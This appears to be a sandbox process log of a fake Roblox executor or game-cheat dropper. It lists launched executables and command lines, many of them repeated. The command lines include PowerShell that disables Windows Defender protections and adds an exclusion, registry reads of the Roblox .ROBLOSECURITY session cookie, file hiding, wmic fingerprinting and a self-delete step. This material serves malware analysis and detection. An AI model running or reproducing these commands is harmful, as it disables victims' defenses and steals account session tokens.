C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Roaming\svhost.exe

C:\Users\Admin\AppData\Roaming\svhost.exe

C:\Users\Admin\AppData\Roaming\svhost.exe.exe

"C:\Users\Admin\AppData\Roaming\svhost.exe.exe"

C:\hostNet\RuntimeBroker.exe

"C:\hostNet\RuntimeBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

